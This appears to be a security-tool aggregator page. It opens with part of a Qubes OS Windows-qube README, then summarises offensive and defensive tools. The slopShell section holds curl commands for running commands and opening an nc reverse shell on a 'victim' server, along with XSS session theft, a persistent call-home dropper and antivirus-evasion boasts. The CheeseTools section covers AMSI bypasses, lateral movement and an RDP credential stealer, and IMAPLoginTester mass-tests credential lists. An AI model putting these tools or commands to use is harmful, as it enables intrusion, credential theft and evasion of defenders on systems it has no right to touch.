Don't forget to apply any applicable updates upon creation of your Windows qube. Microsoft frequently builds up-to-date ISOs for current versions of Windows, such as Windows 10. For these Windows versions, it's recommended to periodically visit the official Microsoft site download-windows.sh provides to get a fresh Windows image out of the box.


Advisories

Windows 7 and Windows Server 2008 R2 reached end of life (EOL) on January 14, 2020. Updates for these OSs are still available with Extended Security Updates (ESUs) if paid for. Office 365 for these OSs will continue getting security updates at no additional cost until January 2023.

If RDP is to be enabled on a Windows 7 qube (not default) then make sure it is fully up-to-date because the latest Windows 7 ISO Microsoft offers is unfortunately still vulnerable to BlueKeep and related DejaBlue vulnerabilities.

A critical vulnerability in Windows 10 and Windows Server 2016/2019 cryptography was recently disclosed. This allows any and all cryptography in these OSs (including HTTPS; the little padlock in your browser) to be easily intercepted. When Microsoft releases an updated ISO, the direct links in download-windows.sh will be updated but until then please update your qubes if they run the aforementioned OSs.


Privacy

qvm-create-windows-qube aims to be the most private way to use Windows. Many Qubes users switched from Windows (or another proprietary OS) in part to get away from Microsoft (or Big Tech in general) and so being able to use Windows from a safe distance is of utmost importance to this project. Or at least, as safe a distance as possible for what is a huge, proprietary binary blob.


Windows Telemetry

Configures Windows telemetry settings to respect privacy.

  • Opt-out of Customer Experience Improvement Program (CEIP)
  • Disable Windows Error Reporting (WER)
  • Disable DiagTrack service
  • Switch off all telemetry in Windows 10 "Settings" application
  • Enable "Security" level of telemetry on compatible editions of Windows 10
  • See spyless.bat for more info

Whonix Recommendations for Windows-Whonix-Workstation

Everything mentioned here up to "Even more security" is implemented. "Most security" is to use an official Whonix-Workstation built yourself from source. This feature is not official or endorsed by Whonix.

It's recommended to read this Whonix documentation to understand the implications of using Windows in this way.


Easy to Reset Fingerprint

There are countless unique identifiers present in every Windows installation such as the MachineGUID, installation ID, NTFS drive Volume Serial Numbers (VSNs) and more. With qvm-create-windows-qube, these unique identifiers can easily be reset by automatically reinstalling Windows.


Limitations

Fingerprinting is possible through the hypervisor in the event of VM compromise, here are some practical examples (not specific to Windows):

  • Xen clocksource as wallclock
    • Timezone leak can at least be mitigated by configuring UTC time in the BIOS/UEFI, the local timezone can still be configured for XFCE Dom0 clock
    • However, correlation between other VMs remains trivial
  • CPUID
  • Generally some of the VM interfaces documented here (e.g. screen dimensions)

Contributing

You can start by giving this project a star! High quality PRs are also welcome! Take a look at the todo list below if you're looking for things that need improvement. Other improvements such as more elegant ways of completing a task, code cleanup and other fixes are also welcome.

Lots of Windows-related GSoCs for those interested.

The logo of this project is by Max Andersen, used with written permission.

This project is the product of an independent effort that is not officially endorsed by Qubes OS.


Qubes Windows Tools Known Issues

Please send patches for these if you are able to. Although, be aware that Qubes Windows Tools is currently unmaintained.


All OSs

All OSs except Windows 7/Windows Server 2008 R2
  • Prompt to install earlier version of .NET
    • This only appears to be a cosmetic issue because qrexec services still work
    • Has been merged but QWT needs to be rebuilt to include it and there's currently no maintainer

Windows 10/Windows Server 2019
  • Private disk creation fails
    • Temporary fix: Close prepare-volume.exe window causing there to be no private disk (can't make a TemplateVM) but besides that Windows qube creation will continue as normal
    • Has been merged but QWT needs to be rebuilt to include it and there's currently no maintainer

Mailing list threads

Windows tagged Qubes OS GitHub issues

Todo
  • Gain the ability to reliably unpack/insert answer file/repack for any given ISO 9660 (Windows ISO format)
    • ISO 9660 is a write-once (i.e. read-only) filesystem; you cannot just add a file to it without creating a whole new ISO
    • Blocking issue for supporting other versions of Windows
    • This is the same way VMWare does it as can be seen by the "Creating Disk..." part in the video below (Further research indicates that they use mkisofs)
    • In the future, it would be best for Qubes to do this by extending core admin for libvirt XML templates
      • Much faster
      • Saves storage due to not having to create a new ISO
  • auto-qwt takes D:\ making QWT put the user profile on E:\; it would be nicer to have it on D:\ so there is no awkward gap in the middle
  • Make Windows answer file automatically use default trial key for Windows installation without hard-coding any product keys anywhere (Windows is finicky on this one)
  • Support Windows 8.1-10 (Note: QWT doesn't fully officially support any OS other than Windows 7 yet; however, everything is functional except the GUI driver)
  • Support Windows Server 2008 R2 to Windows Server 2019
  • Support Windows 10 Enterprise LTSC (Long Term Support Channel)
    • Provides security updates for 10 years, very stable and less bloat than stock Windows 10
  • Provision Chocolatey
  • Add an option to slim down Windows as documented for Qubes here
  • Make windows-mgmt air gapped
  • I recently discovered this is a Qubes Google Summer of Code project
    • Add automated tests
      • Using Travis CI for automated ShellCheck
    • ACPI tables for fetching the Windows license embedded there
      • Found more info on this, should be very simple by just placing the following jinja libvirt template extension in /etc/qubes/templates/libvirt/xen/by-name/<windows_qube>
        • Thanks to @jevank for the patch
    • Port to Python
      • This seems like it would be unnecessary for scripts like create-media.sh where the Python script would essentially just be calling out to external programs
      • This would certainly be suitable for qvm-create-windows-qube.sh though
        • This would allow us to interchange data between Dom0 and the VM without worrying about another Shellshock
  • Automatically select which answer file to use based on Windows ISO characteristics gathered from the wiminfo command (Currently a WIP; see branch)
    • wiminfo works just like DISM on Windows
      • Once extending core admin to allow for libvirt XML templates (answer files) becomes possible (previous todo), we can also securely read the answer file from the ISO without even having to mount it as a loop device, using libguestfs
      • I've also seen libguestfs used on QEMU/KVM so it's definitely a good candidate for this use case
      • Note that libguestfs cannot write (an answer file) to an ISO which is why we cannot use this library until we no longer need to create a whole new ISO to add the answer file to it
  • Follow this Whonix documentation to make Windows-Whonix-Workstation
  • Add functionality for create-media.sh to add MSUs (Microsoft Update standalone packages) to be installed during the Windows PE pass ("Installing updates...") of Windows setup
    • We could fix currently not working QWT installation for old Windows 7 SP1 and Windows Server 2008 R2 ISOs using KB4474419 to add SHA-256 support
    • Allows us to get rid of allow-drivers.vbs hack by fixing SHA-256 automatic driver installation bug
      • The other option is to have Xen sign their drivers with SHA-1 as well, which other driver vendors seem to do, but is not ideal from a security standpoint
    • Patch a couple Windows security bugs?
      • Patch BlueKeep for Windows 7 out-of-the-box
      • Windows Server 2008 R2 base ISO is also vulnerable to ETERNALBLUE and BlueKeep out-of-the-box
      • Probably not worth getting into that, users should just update the VM upon making it
  • Headless mode
    • Help wanted
      • What mechanism is there to accomplish this in Qubes? Something in Qubes GUI agent/daemon?
  • Package this project so its delivery can be made more streamlined and secure through qubes-dom0-update
    • Coming to Qubes R4.1
  • Consider adding ReactOS support as an open source alternative to Windows
    • This would be good at least until a ReactOS template is made
    • Perhaps ReactOS developers may want to use this to develop ReactOS
    • Or maybe just add ReactOS as a template (outside of this project)
      • However, someone would have to maintain this template
      • Also, there may not be much point if QWT/Xen PV drivers don't work
        • At least for basic features like copy/paste and file transfer
    • Interest from both sides
    • ReactOS unattended installations look to be different than Windows ones
    • Only blocking issue I could find is the QEMU SCSI controller type
      • Qubes could extend core admin to support configuring the SCSI controller in the libvirt template
        • This solution seems better because according to this comment it would also fix a bunch of other OSs whose installer doesn't support our current SCSI controller
      • ReactOS could add support for our current SCSI controller type
      • ReactOS Issue
      • Qubes OS Issue
      • Exposing a different SCSI controller does not expand attack surface because QEMU runs in a Xen stub domain
    • ReactOS is in alpha so for most users this probably won't be viable right now
    • Help wanted
      • No timeline for this currently

End Goal

Have a feature similar (or superior) to VMWare's Windows "Easy Install" feature on Qubes. VMWare's solution is proprietary and only available in their paid products.

VirtualBox also has something similar but it's not as feature-rich.




DNS-Black-Cat(DBC) - Multi Platform Toolkit For An Interactive DNS Shell Commands Exfiltration, By Using DNS-Cat You Will Be Able To Execute System Commands In Shell Mode Over DNS Protocol



Multi-platform toolkit for an interactive C2C DNS shell, by using DNS-Black-Cat, you will be able to execute system commands in shell mode over a fully encrypted covert channel.


Server

Ported as a Python script, which acts as a DNS server with the required functionality to provide an interactive shell command interface.


Client

Ported in the following file formats:

  • Windows 32/64 executable (exe)
  • Linux 32/64 executable (ELF)
  • Powershell Script (ps1)
  • Dynamic Link Library (DLL)
  • MacOS Darwin x86_64

Highlights
  • The agent supports multiple platforms.
  • built-in feature with 0xsp-mongoose RED.
  • Available as win32/64 executable, Powershell script, Linux ELF.
  • Encrypted and encoded DNS Queries.
  • Traffic Segmentation.
  • Speed and stability.
  • Stealth and undetectable.

Releases
System          Supported
Windows (EXE)   YES
Windows (PS)    YES
Windows (DLL)   YES
Linux           YES
MacOS           YES
BSD             Still
Android         Still

Support

Support the project for continuous development (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)


Wiki

https://0xsp.com/security%20research%20&%20development%20(SRD)/covert-dns-cc-for-red-teaming-ops



FireStorePwn - Firestore Database Vulnerability Scanner Using APKs



fsp scans an APK and checks the Firestore database for rules that are not secure, testing with or without authentication.

If there are problems with the security rules, attackers could steal, modify or delete data and run up the bill.
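
A hedged sketch of the kind of check involved: an unauthenticated read against the Firestore REST API (the project ID and collection below are placeholders; fsp extracts the real values from the APK):

# Probe a Firestore collection for world-readable rules.
import requests

project = "project-id-from-apk"               # hypothetical value
url = (f"https://firestore.googleapis.com/v1/projects/{project}"
       f"/databases/(default)/documents/users")
r = requests.get(url)
print("Readable without auth!" if r.ok else f"Denied ({r.status_code})")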

Install fsp
sudo wget https://raw.githubusercontent.com/takito1812/FireStorePwn/main/fsp -O /bin/fsp
sudo chmod +x /bin/fsp

Running fsp

Scanning an APK without authentication
fsp app.apk

Scanning an APK with authentication

With email and password.

fsp app.apk test@test.com:123456

With a token.

fsp app.apk eyJhbGciO...


Dystopia - Low To Medium Multithreaded Ubuntu Core Honeypot Coded In Python



Low to medium Ubuntu Core honeypot coded in Python.


Features
  • Optional Login Prompt
  • Logs commands used and IP addresses
  • Customize MOTD, Port, Hostname and how many clients can connect at once (default is unlimited)
  • Save and load config
  • Add support to a plethora of commands

Todo
  • Packet Capture
  • Better Logging
  • Service
  • Geolocation
  • Email Alerts
  • Insights such as charts & graphs
  • Add Default Configurations
  • Optimize / Fix Code

How to run
sudo apt update && sudo apt upgrade -y
python3 dystopia.py

Command Line Arguments
usage: dystopia.py [-h] [--port PORT] [--motd MOTD] [--max MAX] [--username USERNAME] [--password PASSWORD]
[--hostname HOSTNAME] [--localhost] [--save SAVE] [--load LOAD]

Dystopia | A python honeypot.

optional arguments:
-h, --help show this help message and exit
--port PORT, -P PORT specify a port to bind to
--motd MOTD, -m MOTD specify the message of the day
--max MAX, -M MAX max number of clients allowed to be connected at once.
--username USERNAME, -u USERNAME
username for fake login prompt and the user for the honeypot session
--password PASSWORD, -p PASSWORD
password for fake login prompt
--hostname HOSTNAME, -H HOSTNAME
hostname of the honeypot
--localhost, -L host honeypot on localhost
--save SAVE, -s SAVE save config to a json file
--load LOAD, -l LOAD load a config file

How to add Support for More Commands

You can add support for new commands by editing the file "commands.json". The format is command:output, for example:

{
"dog":"Dog command activated!"
}
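
A hedged sketch of how such a lookup might work (illustrative; not necessarily dystopia.py's exact logic):

# Map a received command line to its canned output from commands.json.
import json

with open("commands.json") as f:
    commands = json.load(f)

def respond(line: str) -> str:
    cmd = line.strip()
    return commands.get(cmd, f"-bash: {cmd}: command not found")

print(respond("dog"))   # -> "Dog command activated!"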


 

AnalyticsRelationships - Get Related Domains / Subdomains By Looking At Google Analytics IDs




> Get related domains / subdomains by looking at Google Analytics IDs
> Python/GO versions
> By @JosueEncinar

This script tries to get related domains / subdomains by looking at Google Analytics IDs from a URL. It first searches the webpage for a Google Analytics ID and then queries builtwith.com with that ID.

Note: it does not work with all websites. The ID is searched for with the following expressions:

->  "www\.googletagmanager\.com/ns\.html\?id=[A-Z0-9\-]+"
-> GTM-[A-Z0-9]+
-> "UA-\d+-\d+"

Available versions:

Installation:

Installation according to language.


Python
> git clone https://github.com/Josue87/AnalyticsRelationships.git
> cd AnalyticsRelationships/Python
> sudo pip3 install -r requirements.txt

GO
> git clone https://github.com/Josue87/AnalyticsRelationships.git
> cd AnalyticsRelationships/GO
> go build -ldflags "-s -w"

Usage

Usage according to language


Python
> python3 analyticsrelationships.py -u https://www.example.com

Or redirect output to a file (banner or information messages are sent to the error output):

python3 analyticsrelationships.py -u https://www.example.com > /tmp/example.txt

GO
>  ./analyticsrelationships --url https://www.example.com

Or redirect output to a file (banner or information messages are sent to the error output):

>  ./analyticsrelationships --url https://www.example.com > /tmp/example.txt

Examples

Python

Output redirection to file /tmp/example.txt:


Without redirection:


GO

Without redirection:


Working with file redirection works just like in Python.


Author

This project has been developed by:


Disclaimer!

This is a PoC. The author is not responsible for any illegitimate use.




HookDump - Security Product Hook Detection



EDR function hook dumping

Please refer to the Zeroperil blog post for more information https://zeroperil.co.uk/hookdump/


Building source
  • In order to build this you will need Visual Studio 2019 (community edition is fine) and CMake. The batch file Configure.bat will create two build directories with Visual Studio solutions.
  • The project may build with MinGW with the correct CMake command line; this is untested, YMMV.
  • There is a dependency on zydis disassembler, so be sure to update the sub-modules in git before configuring the project.
  • There is a 32-bit and a 64-bit project; you may find that EDRs hook different functions in 32/64 bit, so building and running both executables may provide more complete results

Notes
  • Some EDRs replace the WOW stub in the TEB structure (specifically Wow32Reserved) in order to hook system calls for 32-bit binaries. In this case you may see zero hooks, since no jump instructions are present in NTDLL. Most likely you will see hooks in the x64 version, as the syscall instruction is used for system calls instead of a WOW stub
  • We have noted that Windows Defender does not use any user mode hooks
  • This tool is designed to be run as a standard user, elevation is not required

Hook Types Detected

JMP

A jump instruction has been patched into the function to redirect execution flow


WOW

Detection of the WOW64 syscall stub being hooked, which allows filtering of all system calls


EAT

The address in the in-memory export address table does not match the corresponding address in the copy on disk


GPA

GetProcAddress hook, an experimental feature; this is only output in verbose mode, when the result of GetProcAddress does not match the manually resolved function address. YMMV with this, and some care should be taken to verify the results.


Verification

The only way to truly verify the correct working of the program is to check in a debugger if hooks are present. If you are getting a zero hooks result and are expecting to see something different, then first verify this in a debugger and please get in touch.



slopShell - The Only Php Webshell You Need



php webshell

Since I derped, and forgot to talk about usage. Here goes.

For this shell to work, you need 2 things: a victim that allows php file upload (yourself, in an educational environment) and a way to send http requests to this webshell.


Basic Usage Video(Hosted on Youtube):


Current VT Detection ratio: 2/59

Current VT Detection ratio (obfuscated version): 0/59


The issue with this detection is that I have not found a viable workaround for the eval keyword; if there were no call to eval, this script would be undetectable.


Setup

Ok, so here we go folks, there was an itch I had to write something in PHP so this is it. This webshell has a few bells and whistles, and more are added every day. You will need a pgsql server running that you control. However you implement that is on you.

Debian: apt install -y postgresql php php-pear && python -m pip install proxybroker --user

RHEL Systems: dnf -y -b install postgresql-server postgresql php php-pear && python -m pip install proxybroker --user

WIN: install the php msi, and make sure you have an active postgresql server that you can connect to running somewhere. figure it out.

Once you have these set up properly, confirm that they are running. A command I would encourage using is pg_ctl: you can create the DB that way, or at least init it and start it. Then all the db queries will work fine.


How to interact.

Firstly, you need to choose a valid User-Agent to use; this is kind of like a first layer of protection against your webshell being accidentally stumbled upon by anyone but you. I went with sp/1.1 as it's a non-typical user-agent. This can cause red flags in a pentest, and your access or script may be blocked or deleted, so be smart about it. Code obfuscation wouldn't hurt; I did not add that in because that's on you to decide. To use the shell, there are some presets to aid you in your pentest and traversal of the machine. I did not add much for Windows, because I do not like developing for Windows. If you have routines or tricks to add or know about, feel free to submit an issue with your suggestion and I'll add it. An example of how to use this webshell with curl:

curl https://victim/slop.php?qs=cqP -H "User-Agent: sp/1.1" -v

or to execute custom commands:

curl https://victim/slop.php --data "commander=id" -H "User-Agent: sp/1.1" -v

Or to attempt to establish a reverse shell to your machine:

curl https://victim/slop.php --data "rcom=1&mthd=nc&rhost=&rport=&shell=sh" -H "User-Agent: sp/1.1" -v

  • mthd = the method you want to use to establish the reverse shell; this is predefined in the $comma array, feel free to add to it. Optional: if it is null, the script will choose for you.
  • rhost = you. This and rport are not required, as the script defaults to using netcat with the IP address in the $_SERVER["REMOTE_ADDR"] PHP env variable.
  • rport = your listener port; the default was set to 1634, just because.
  • shell = the type of system shell you want to have. I know bash isn't standard on all systems, but that's why it's nice for you to do some system recon before you try to execute this command.
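
The same interactions as the curl examples above, sketched as a small Python client (the target URL is a placeholder; verify=False mirrors hitting a self-signed victim cert):

# Talk to the webshell with the expected User-Agent "auth" header.
import requests

URL = "https://victim/slop.php"
HEADERS = {"User-Agent": "sp/1.1"}

print(requests.get(URL, params={"qs": "cqP"}, headers=HEADERS, verify=False).text)
print(requests.post(URL, data={"commander": "id"}, headers=HEADERS, verify=False).text)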

Here is the better part of this shell. If someone happens upon this shell without supplying the exact user agent string specified in the script, it will produce a 500 error with a fake error page, then it will attempt some XSS to steal that user's session information and send it back to a handler script on your server/system. This will then attempt to store the information in a running log file. If it is unable to do so, well, the backup is your logs. Once the XSS has completed, this shell will redirect the user back to the root (/) of the webserver. So, you'll steal sessions if someone finds this; you can even beef it up to execute commands on the server on behalf of the user, or drop a reverse shell on the user's browser through BeEF or another method. The possibilities are legit endless.


Images of use cases

In browser, navigated to without the proper user-agent string. (1st level of auth)


Use in the terminal, which is how this was designed to work, using curl with the -vH "User-Agent: sp1.1" switches.


Obfuscated script example:


Generation 2 obfuscated script:


Interacting through the client script

Once the client script is complete, you as the operator will not need to interact through curl to utilize this shell. There will be a client script that you can use to execute all commands/control. In addition to this client script, there is a dropper. This dropper will ensure the script is run at startup even if the website is removed, including some call-home functions, and obfuscation if it is requested, on a level from 1 to 3, with 3 being the highest: every function will be rot-ciphered and then base64-encoded, with the whole file itself being base64-encoded and a random name assigned to the file. This can help avoid signature detection.


Encryption

Once the encryption routine is fully worked out, the dropper script will be encrypted, and highly obfuscated. Example output:

Base64 decoded: also a test 123
Re-Encoded: YWxzbyBhIHRlc3QgMTIz
Key: 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
Key Length: 96
Encryption Result:
Array
(
[original] => also a test 123
[key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
[encrypted] => meIHs/y6_U7U~7(M
[base64_Encoded] => bWVJSAAdcw4veTZfVQU3VX43KE0=
)
Decrypt Test:
Array
(
[key] => 4212bd1ff1d366f23ca77021706a9a29cb824b45f82ae312bcf220de68c76760289f1d5550aa341002f1cfa9831e871e
[encrypted] => meIHs/y6_U7U~7(M
[decrypted] => YWxzbyBhIHRlc3QgMTIz
[base64_decoded] => also a test 123
[original] => also a test 123
)

Additional

This was going to remain private. But I decided otherwise.

Do not abuse this shell, and get a signature attached to it, this is quite stealthy right now since its brand new.

I, as the maintainer, am in no way responsible for the misuse of this product. This was published for legitimate penetration testing/red teaming purposes, and/or for educational value. Know the applicable laws in your country of residence before using this script, and do not break the law whilst using this. Thank you and have a nice day.

If you have enjoyed this script, it is obligatory that you follow me and throw a star on this repo... because future editions will have more features (or bugs) depending on how you look at it.




IMAPLoginTester - Script That Reads A Text File With Lots Of E-Mails And Passwords, And Tries To Check If Those Credentials Are Valid By Trying To Login On IMAP Servers



IMAPLoginTester is a simple Python script that reads a text file with lots of e-mails and passwords, and tries to check if those credentials are valid by attempting to log in to the respective IMAP servers.
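
The core check the script performs can be sketched with Python's standard imaplib (simplified: the real script handles server lookup, SOCKS5 proxying, timeouts, and sleep intervals; the input format and the "imap." host guess below are assumptions):

import imaplib

def try_login(host: str, email: str, password: str, timeout: int = 10) -> bool:
    """Return True if the IMAP server accepts the credentials."""
    try:
        conn = imaplib.IMAP4_SSL(host, 993, timeout=timeout)  # timeout: Python 3.9+
        conn.login(email, password)
        conn.logout()
        return True
    except (imaplib.IMAP4.error, OSError):
        return False

# Assumes each input line looks like "user@example.com:password".
with open("credentials.txt") as fh:
    for line in fh:
        email, _, password = line.strip().partition(":")
        host = "imap." + email.split("@", 1)[1]  # naive server guess
        print(email, "OK" if try_login(host, email, password) else "FAIL")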


Usage:

usage: imaplogintester.py [-h] -i INPUT [-o OUTPUT] [-s] [-t SLEEP_TIME] [-T TIMEOUT] [-P SOCKS5_PROXY] [-v]

optional arguments:
-h, --help show this help message and exit
-i INPUT, --input INPUT
input file with e-mails and passwords
-o OUTPUT, --output OUTPUT
save successes to output file
-s, --show-successes show successes only (no failures)
-t SLEEP_TIME, --sleep-time SLEEP_TIME
set sleep time between tests (in seconds)
-T TIMEOUT, --timeout TIMEOUT
set login requests timeout (in seconds)
-P SOCKS5_PROXY, --socks5-proxy SOCKS5_PROXY
use a SOCKS5 proxy (eg: "localhost:9050")
-v, --verbose show verbose messages
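
For example, to test every credential pair in a file, save the hits, show only successes, and sleep two seconds between attempts (file names are illustrative):

python3 imaplogintester.py -i emails.txt -o successes.txt -s -t 2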


CheeseTools - Self-developed Tools For Lateral Movement/Code Execution



This repository was built on top of the already existing MiscTool, so a big shout-out to rasta-mouse for releasing those tools and for giving me the right motivation to work on them.


CheeseExec

Command Exec / Lateral movement via PsExec-like functionality. Must be running in the context of a privileged user. The tool is based on rasta-mouse's CsExec, but is designed to allow additional control over the service creation, specifically:

  • Create (checks whether the service exists; if not, tries to create it)
  • Start (checks whether the service exists and is stopped; if so, attempts to start it; if it doesn't exist, tries to create it and start it)
  • Stop (checks whether the service exists and is running; if so, attempts to stop it)
  • Delete (checks whether the service exists and is running; if so, attempts to stop it and then delete it; otherwise it deletes it directly)
CheeseExec.exe <targetMachine> <serviceName> <binPath> <action>
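
An illustrative run (host, service name, and binary path are placeholders):

CheeseExec.exe SRV01 UpdaterSvc "C:\Windows\Temp\payload.exe" Create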

Also see TikiService.


CheesePS

CheesePS is a Command Exec / Lateral Movement framework. It relies on System.Management.Automation.PowerShell to load and run arbitrary code via PowerShell. The tool is natively capable of bypassing common restrictions by creating and using PowerShell runspaces on local or remote targets. Must be running in the context of a privileged user (if using PowerShell Remoting).

The tool was originally made as an enhancement of rasta-mouse's CsPosh, but grew enough to become a framework in its own right, and can now be used as a general PowerShell injector.

The idea behind this tool has been summarised in the following article:

The main functionalities implemented are:

  • BuiltIn CLM Bypass using REGINI
  • BuiltIn AmsiBypass that patches Amsi before executing any other command
    • Permits to specify an alternate PowerShell script for AMSI bypass
  • BuiltIn WldpBypass that patches WLDP before executing assemblies
    • Permits to specify an alternate PowerShell script for WLDP bypass
  • Import modules and scripts before execution
    • Against a local target: modules are imported via filesystem, smb, or http[s]
    • Against a remote target: modules are loaded directly from the local machine using WS-Management
  • Download binary and execute
    • Standard: Transfer -> Write to disk -> Execute
    • Reflective: Transfer -> Execute from memory
  • Supports AES Encryption of PS modules, C# assemblies and other executables to evade detection
    • All imported Modules/Assemblies can be encrypted in transit or at rest, and are decrypted just before usage

The following screenshot is a decently accurate schema to describe the tool's workflow:

 

Usage:
-t, --target=VALUE Target machine
-c, --code=VALUE Code to execute
-e, --encoded Indicates that provided code is base64 encoded
-a, --am-si-bypass=VALUE Uses the given PowerShell script to bypass AMSI (fs, smb or http[s])
--aX, --encrypted-am-si Indicates that provided AMSI bypass is encrypted
-i, --import=VALUE Imports additional PowerShell modules (fs, smb or http[s])
--iX, --encrypted-imports Indicates that provided PowerShell modules are encrypted
-o, --outstring Append Out-String to code
-r, --redirect Redirect stderr to stdout
-d, --domain=VALUE Domain for alternate credentials
-u, --username=VALUE Username for alternate credentials
-p, --password=VALUE Password for alternate credentials
-X, --encrypt=VALUE Encrypt a script with a hardcoded key
-D, --decrypt=VALUE Test decryption of a script with a hardcoded key
-n, --skip-bypass=VALUE Skip AMSI (A), WLDP (W) or ALL (*) bypass techniques
-l, --lockdown-escape Try to enable PowerShell FullLanguage mode using REGINI
-w, --wldp-bypass=VALUE Uses the given PowerShell script to bypass WLDP (fs, smb or http[s])
--wX, --encrypted-wldp Indicates that provided WLDP bypass is encrypted
-x, --executable=VALUE [Download and] Execute given executable
--xX, --encrypted-executable Indicates that provided Exe/DLL is encrypted
--xCS, --executable-csharp Indicates that the executable provided is C# (.NET)
-R, --reflective-injection Uses Invoke-ReflectivePEInjection to load the assembly from memory (requires Invoke-ReflectivePEInjection to be imported!)
-P, --powershell-decrypt Force use of PowerShell-based decryption
-k, --encryption-key=VALUE Uses the provided key for encryption/decryption
--ssl Force use of SSL
-h, -?, --help Show Help

Note: If executed without a target, the script will execute against the local machine
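
An illustrative invocation (target and command are placeholders) that runs a command on a remote host with Out-String appended and stderr redirected, leaving the built-in bypasses enabled:

CheesePS.exe -t SRV01 -c "whoami /all" -o -r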


Advantages of using the tool over raw PowerShell:
  • Cleaner, more intuitive command line
  • Automatic bypasses (CLM, AMSI, WLDP)
  • Avoids performing outbound connections from the remote target (everything is transferred through WS-Management)
  • Supports full encryption in transit

Also see AmsiBypass.


CheeseDCOM

Command Exec / Lateral Movement via DCOM. Must be running in the context of a privileged user. This tool is based on rasta-mouse's CsDCOM, but has been improved with additional methods, adapting it to the new research by Philip Tsukerman. There is also an experimental method to "fix" any attempts to disable the affected DCOM objects via dcomcnfg, but it requires some preconditions in order to work properly.

The idea behind this tool has been summarised in the following article:

Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro.

Usage:
-t, --target=VALUE Target Machine
-b, --binary=VALUE Binary: powershell.exe
-a, --args=VALUE Arguments: -enc <blah>
-m, --method=VALUE Methods: MMC20Application, ShellWindows,
ShellBrowserWindow, ExcelDDE, VisioAddonEx,
OutlookShellEx, ExcelXLL, VisioExecLine,
OfficeMacro
-r, --reg, --registry Enable registry manipulation
-h, -?, --help Show Help

Note: If executed with -t ., the script will execute against the local machine
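
An illustrative run (target and encoded command are placeholders):

CheeseDCOM.exe -t SRV01 -b powershell.exe -a "-enc <blah>" -m MMC20Application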

Also see Lateral Movement Using DCOM Objects and C#


CheeseRDP

RDP credentials stealer via RDI (reflective DLL injection). Must be running in the context of a privileged user, or a user with SeImpersonatePrivilege. This tool is built on top of RdpThief by MDSec, but has been fully wrapped in a single C# assembly so it can be run via .NET reflection (Assembly.Load and similar). In this way, it's possible to run it via Covenant without the hassle of uploading a DLL to the target system.

Usage:
CheeseRDP [actions]
Actions:
wait: keep listening for any new mstsc.exe process indefinitely (stop with ctrl-C)
clean: delete the credentials dump file if present
dump: dump the content of the file if present, parsing the credentials in a compact format

Note: If executed without options, the program will try to inject into an active mstsc.exe process (the default wait time is 10 seconds)
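
For example, to keep harvesting credentials from every new mstsc.exe session and later print whatever was captured:

CheeseRDP wait
CheeseRDP dump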


Credits


Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite



CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since significant re-architecting of the framework and tools is taking place, and the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to adopt new branding so that there would be less confusion between the implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET), causing many more unintended collisions. As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding to your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to install manually by unzipping into the appropriate directory.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
